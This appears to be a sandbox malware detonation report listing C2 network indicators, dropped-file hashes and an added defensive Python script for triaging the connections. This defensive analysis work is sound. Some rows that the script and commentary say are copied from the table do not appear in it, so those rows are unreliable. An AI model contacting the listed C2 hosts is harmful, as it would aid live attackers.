SG 45.77.45.115:80 pool.usa-138.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 115.45.77.45.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
MD 194.180.174.53:80 tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 files.000webhost.com udp
HU 91.219.236.18:80 91.219.236.18 tcp
US 8.8.8.8:53 18.236.219.91.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
MD 194.180.174.41:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 22ssh.com udp
MD 194.180.174.41:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
HU 91.219.236.148:80 tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
HU 91.219.236.148:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 184.143.101.95.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 88.221.135.57:443 r.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
US 8.8.8.8:53 57.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 182.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 bing.com udp
US 13.107.21.200:443 bing.com tcp
US 13.107.21.200:443 bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.68:443 login.microsoftonline.com tcp
US 8.8.8.8:53 200.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
RU 80.87.192.115:80 tcp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
N/A 127.0.0.1:58491 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:58491 tcp
N/A 127.0.0.1:58491 tcp
US 8.8.8.8:53 google.com udp
GB 142.250.187.238:80 google.com tcp
GB 142.250.187.238:80 google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 172.217.16.228:80 www.google.com tcp
GB 172.217.16.228:80 www.google.com tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 support.google.com udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
GB 95.101.143.184:443 www.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 88.221.135.57:443 r.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
GB 95.101.143.182:443 th.bing.com tcp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 www.hitmanpro.com udp
GB 184.28.198.162:443 www.hitmanpro.com tcp
GB 184.28.198.162:443 www.hitmanpro.com tcp
US 8.8.8.8:53 162.198.28.184.in-addr.arpa udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 pricingapi.cleverbridge.com udp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 172.64.155.119:443 geolocation.onetrust.com tcp
US 104.16.243.229:443 pricingapi.cleverbridge.com tcp
GB 184.28.198.162:443 www.hitmanpro.com tcp
US 8.8.8.8:53 42.87.18.104.in-addr.arpa udp
US 8.8.8.8:53 119.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 229.243.16.104.in-addr.arpa udp
GB 95.101.143.184:443 www.bing.com tcp
US 8.8.8.8:53 sophos-privacy.my.onetrust.com udp
US 172.64.155.119:443 sophos-privacy.my.onetrust.com tcp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 184.28.198.162:443 www.hitmanpro.com tcp
US 104.18.87.42:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 download.sophos.com udp
GB 2.21.185.132:443 download.sophos.com tcp
GB 2.21.185.132:443 download.sophos.com tcp
US 8.8.8.8:53 132.185.21.2.in-addr.arpa udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 files.surfright.nl udp
US 8.8.8.8:53 scan.hitmanpro.com udp
NL 185.105.204.28:443 files.surfright.nl tcp
NL 52.174.35.5:80 scan.hitmanpro.com tcp
US 8.8.8.8:53 28.204.105.185.in-addr.arpa udp
US 8.8.8.8:53 5.35.174.52.in-addr.arpa udp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 remnants.hitmanpro.com udp
US 185.228.168.9:53 8.8.8.8.zen.spamhaus.org udp
NL 23.97.160.56:443 remnants.hitmanpro.com tcp
US 8.8.8.8:53 9.168.228.185.in-addr.arpa udp
US 8.8.8.8:53 56.160.97.23.in-addr.arpa udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 hash.hitmanpro.com udp
NL 23.97.160.56:443 hash.hitmanpro.com tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 scan.hitmanpro.com udp
NL 52.174.35.5:443 scan.hitmanpro.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
CA 172.98.92.42:58491 tcp
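The Network table above is raw sandbox output: resolver queries to 8.8.8.8, a PTR lookup for nearly every peer, the analyst's own browsing (bing.com, google.com, hitmanpro.com) and the sample's own traffic are interleaved in arrival order. Two patterns are worth pulling out by hand: `hackerinvasion.f3322.net` and `kazya1.hopto.org` are queried dozens of times and never appear in a tcp row, which is what a RAT's re-resolve loop looks like when its dynamic-DNS name does not resolve during detonation, while `179.13.1.253:8050`, `172.98.92.42:58491` and `59.56.110.231:8898` are connections on non-standard ports, two of them straight to an IP with no name. The script below is an added example, not part of this report or of the sandbox's tooling, of triaging such rows automatically: it parses the `Country Destination Domain Proto` layout, drops PTR noise, keeps resolver queries only as a per-name lookup count, and flags dynamic-DNS names, external IP-check services, direct-to-IP tcp connections and unusual ports. The provider list, IP-check host list and "common port" set are this example's own assumptions; `SAMPLE` is a subset of rows copied from the table above.

```python
"""Triage a sandbox 'Country Destination Domain Proto' network table.

Added example; not code from the report or the sandbox vendor. The
suffix/host lists and port policy below are assumptions for illustration.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Assumption: free dynamic-DNS providers commonly used for RAT C2.
DYNDNS_SUFFIXES = ("f3322.net", "duckdns.org", "hopto.org", "no-ip.org", "ddns.net")
# Assumption: services a stealer/RAT calls to learn the victim's public IP.
IP_CHECK_HOSTS = {"api.ipify.org", "whatismyipaddress.com"}
# Assumption: ports treated as ordinary web/DNS/mDNS traffic.
COMMON_PORTS = {53, 80, 443, 5353}

# Rows: "<cc> <ip>:<port> [<domain>] <tcp|udp>"; the domain column is empty
# for direct-to-IP connections, so it is optional in the pattern.
ROW_RE = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)

# Constructed sample: a subset of rows copied from the report's Network table.
SAMPLE = """\
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
RU 80.87.192.115:80 tcp
CN 59.56.110.231:8898 tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
GB 95.101.143.184:443 www.bing.com tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:58491 tcp
"""


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    domain: str  # "" when the sandbox logged no name for the peer
    proto: str


def parse_rows(text):
    """Parse table rows into Flow records; lines that do not match are skipped."""
    flows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            flows.append(Flow(m["cc"], m["ip"], int(m["port"]), m["domain"] or "", m["proto"]))
    return flows


def name_reasons(domain):
    """Flags that follow from the name alone (so a bare DNS query can trigger them)."""
    r = []
    if domain and any(domain == s or domain.endswith("." + s) for s in DYNDNS_SUFFIXES):
        r.append("dynamic-dns")
    if domain in IP_CHECK_HOSTS:
        r.append("ip-check")
    return r


def flow_reasons(f):
    """Flags that follow from how the connection was made."""
    r = []
    if f.proto == "tcp" and not f.domain and not f.ip.startswith("127."):
        r.append("direct-ip")
    if f.port not in COMMON_PORTS:
        r.append(f"port-{f.port}")
    return r


def triage(text):
    """Return {indicator: {reasons, lookups, connections, countries}} for flagged peers.

    The indicator is the domain when one was logged, else "ip:port". Resolver
    queries (port 53) only contribute to `lookups`; PTR lookups are discarded.
    """
    flows = [f for f in parse_rows(text) if not f.domain.endswith(".in-addr.arpa")]
    lookups = Counter(f.domain for f in flows if f.port == 53 and f.domain)
    out = {}
    # Names flagged by their DNS query alone: a RAT re-resolving an unresolvable
    # DDNS C2 shows up here with lookups > 0 and connections == 0.
    for name, n in lookups.items():
        r = name_reasons(name)
        if r:
            out[name] = {"reasons": set(r), "lookups": n, "connections": 0, "countries": set()}
    for f in flows:
        if f.port == 53:
            continue
        r = name_reasons(f.domain) + flow_reasons(f)
        if not r:
            continue
        key = f.domain or f"{f.ip}:{f.port}"
        e = out.setdefault(
            key, {"reasons": set(), "lookups": lookups.get(key, 0), "connections": 0, "countries": set()}
        )
        e["reasons"].update(r)
        e["connections"] += 1
        e["countries"].add(f.country)
    return out


def unresolved_ddns(summary):
    """Dynamic-DNS names that were queried but never connected to, sorted."""
    return sorted(k for k, v in summary.items()
                  if "dynamic-dns" in v["reasons"] and v["lookups"] and not v["connections"])


if __name__ == "__main__":
    for key, v in sorted(triage(SAMPLE).items()):
        print(f"{key:28} lookups={v['lookups']} conns={v['connections']} "
              f"{sorted(v['countries'])} {sorted(v['reasons'])}")
```

Reading the output against the full table: the two names returned by `unresolved_ddns` are the ones to watch in your own DNS logs even though no C2 session was captured, and the `direct-ip` / `port-*` entries are the peers to pivot on in flow data. The loopback row (`127.0.0.1:58491`) is flagged on port alone; it shares a port with the `172.98.92.42` connection, which is worth checking in the process and handle data before drawing any conclusion.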

Files

memory/4068-0-0x0000000074E62000-0x0000000074E63000-memory.dmp

memory/4068-1-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4068-2-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Users\Admin\AppData\Roaming\healastounding.exe

MD5 6fb798f1090448ce26299c2b35acf876
SHA1 451423d5690cffa02741d5da6e7c45bc08aefb55
SHA256 b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f
SHA512 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3

C:\Users\Admin\AppData\Roaming\Pluto Panel.exe

MD5 ed666bf7f4a0766fcec0e9c8074b089b
SHA1 1b90f1a4cb6059d573fff115b3598604825d76e6
SHA256 d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264
SHA512 d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

memory/3636-44-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

MD5 0fd7de5367376231a788872005d7ed4f
SHA1 658e4d5efb8b14661967be2183cc60e3e561b2b6
SHA256 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd
SHA512 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863

memory/3636-50-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4828-62-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4068-67-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Users\Admin\AppData\Roaming\gay.exe

MD5 8eedc01c11b251481dec59e5308dccc3
SHA1 24bf069e9f2a1f12aefa391674ed82059386b0aa
SHA256 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d
SHA512 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

memory/2336-118-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/3636-151-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Windows\SysWOW64\TXPlatforn.exe

MD5 a4329177954d4104005bce3020e5ef59
SHA1 23c29e295e2dbb8454012d619ca3f81e4c16e85a
SHA256 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd
SHA512 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

memory/5052-172-0x0000000000400000-0x000000000044F000-memory.dmp

C:\Users\Admin\AppData\Roaming\4.exe

MD5 e6dace3f577ac7a6f9747b4a0956c8d7
SHA1 86c71169025b822a8dfba679ea981035ce1abfd1
SHA256 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63
SHA512 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268

memory/5052-165-0x0000000000400000-0x000000000044F000-memory.dmp

C:\Windows\SysWOW64\240629765.txt

MD5 2d4c94d56bc6ff4b67a7e4c78823128f
SHA1 64f0eabe0213c7e996f53f64daf1b1cd41cd165e
SHA256 4d53ccb9a375d968ac7bd0670f3cda71d195bae334445d97c46e96b6dbe34a84
SHA512 8e476563ea4876c7170febdb9c75f93298caf8f02aa0cdfee13e7735a85f0e60eb12e22b191e7432bdfcd9507d940df3dfb54969f170ede2bcf2e456ca6a6a4e

C:\Users\Admin\AppData\Local\Temp\svchos.exe

MD5 3b377ad877a942ec9f60ea285f7119a2
SHA1 60b23987b20d913982f723ab375eef50fafa6c70
SHA256 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84
SHA512 af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f

memory/764-153-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/764-152-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/764-149-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/4812-146-0x0000000000400000-0x00000000007C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

MD5 8f1c8b40c7be588389a8d382040b23bb
SHA1 bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a
SHA256 ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1
SHA512 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f

C:\Users\Admin\AppData\Roaming\a.exe

MD5 52cfd35f337ca837d31df0a95ce2a55e
SHA1 88eb919fa2761f739f02a025e4f9bf1fd340b6ff
SHA256 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448
SHA512 b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73

memory/2336-121-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/2336-120-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/2908-109-0x00000000008B0000-0x00000000008C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\aaa.exe

MD5 860aa57fc3578f7037bb27fc79b2a62c
SHA1 a14008fe5e1eb88bf46266de3d5ee5db2e0a722b
SHA256 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29
SHA512 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

C:\Users\Admin\AppData\Roaming\Opus.exe

MD5 759185ee3724d7563b709c888c696959
SHA1 7c166cc3cbfef08bb378bcf557b1f45396a22931
SHA256 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641
SHA512 ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c

C:\Users\Admin\AppData\Roaming\test.exe

MD5 7e50b292982932190179245c60c0b59b
SHA1 25cf641ddcdc818f32837db236a58060426b5571
SHA256 a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8
SHA512 c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885

C:\Users\Admin\AppData\Roaming\___11.19.exe

MD5 a071727b72a8374ff79a695ecde32594
SHA1 b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc
SHA256 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745
SHA512 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400

memory/4828-58-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/1820-47-0x0000000000400000-0x0000000000625000-memory.dmp

C:\Users\Admin\AppData\Roaming\22.exe

MD5 dbf9daa1707b1037e28a6e0694b33a4b
SHA1 ddc1fcec1c25f2d97c372fffa247969aa6cd35ef
SHA256 a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6
SHA512 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd

memory/3636-30-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4812-174-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/788-179-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

MD5 78d40b12ffc837843fbf4de2164002f6
SHA1 985bdffa69bb915831cd6b81783aef3ae4418f53
SHA256 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44
SHA512 c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79

memory/4812-211-0x0000000006370000-0x0000000006382000-memory.dmp

memory/4812-205-0x0000000005CB0000-0x00000000062C8000-memory.dmp

memory/788-204-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/4812-213-0x0000000006390000-0x000000000649A000-memory.dmp

memory/788-218-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

MD5 870d6e5aef6dea98ced388cce87bfbd4
SHA1 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54
SHA256 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0
SHA512 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566

memory/4812-219-0x00000000064A0000-0x00000000064DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\3.exe

MD5 748a4bea8c0624a4c7a69f67263e0839
SHA1 6955b7d516df38992ac6bff9d0b0f5df150df859
SHA256 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e
SHA512 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp

MD5 28219e12dd6c55676bdf791833067e9d
SHA1 a4c854d929404e5073d16610c62dfa331c9727a0
SHA256 d3035bd90ad0e9fedeecb44da09e78421b5e6e1e0bbed1afc624750043355540
SHA512 e8c118063052002745c503b8fd0decfecf38f31e71e4dbdedc79bb8e91d443d65a33e7d983d4c0e1d6ee1eb9045100c2324b941b3bef00e69d4d91eb7d6d0161

memory/4812-235-0x0000000006520000-0x000000000656C000-memory.dmp

memory/788-229-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

MD5 b14120b6701d42147208ebf264ad9981
SHA1 f3cff7ac8e6c1671d2c3387648e54f80957196de
SHA256 d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97
SHA512 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b

memory/788-184-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/788-185-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/4812-176-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/4448-239-0x0000000000400000-0x00000000019AA000-memory.dmp

C:\ProgramData\kaosdma.txt

MD5 2c807857a435aa8554d595bd14ed35d1
SHA1 9003a73beceab3d1b1cd65614347c33117041a95
SHA256 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b
SHA512 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9

memory/1492-265-0x0000000000140000-0x00000000001D4000-memory.dmp

memory/1492-301-0x0000000000980000-0x000000000098C000-memory.dmp

memory/1492-302-0x0000000000990000-0x000000000099A000-memory.dmp

memory/1492-325-0x00000000009B0000-0x00000000009BC000-memory.dmp

memory/4448-323-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-329-0x00000000060E0000-0x00000000064A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp

MD5 2862e61d09852ea2886c036af0465051
SHA1 45e30b14543868213f7f1cba0a1e0cc840fb2cd2
SHA256 d4ba6219d0aff5a36d129a8475cf35b00043d205f751f63ddd56a5c7d4a03ff3
SHA512 33dfd9d12adaa19dd3d4dd7013930e233dd3ff1d114e1e86e50d20ffa848a27582eebdffc09ab974b8de86316c01da6f6254f349992ad507d0f8b13cf0e36579

memory/5052-332-0x0000000000400000-0x000000000044F000-memory.dmp

memory/4448-312-0x00000000060E0000-0x00000000064A2000-memory.dmp

C:\Windows\SysWOW64\主动防御服务模块.exe (GBK filename mis-decoded as Latin-1 in the original listing; "Active Defense Service Module.exe")

MD5 889b99c52a60dd49227c5e485a016679
SHA1 8fa889e456aa646a4d0a4349977430ce5fa5e2d7
SHA256 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910
SHA512 08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641

memory/4448-309-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-306-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-304-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/1492-303-0x00000000009A0000-0x00000000009AC000-memory.dmp

memory/4448-319-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-315-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4828-339-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4828-344-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4464-355-0x0000000000420000-0x00000000004E9000-memory.dmp

memory/4464-356-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4464-354-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4464-353-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4448-361-0x0000000000400000-0x00000000019AA000-memory.dmp

memory/3636-364-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3636-362-0x0000000000400000-0x0000000000495000-memory.dmp

memory/4384-372-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-373-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-374-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-383-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-382-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-381-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-380-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-379-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-378-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
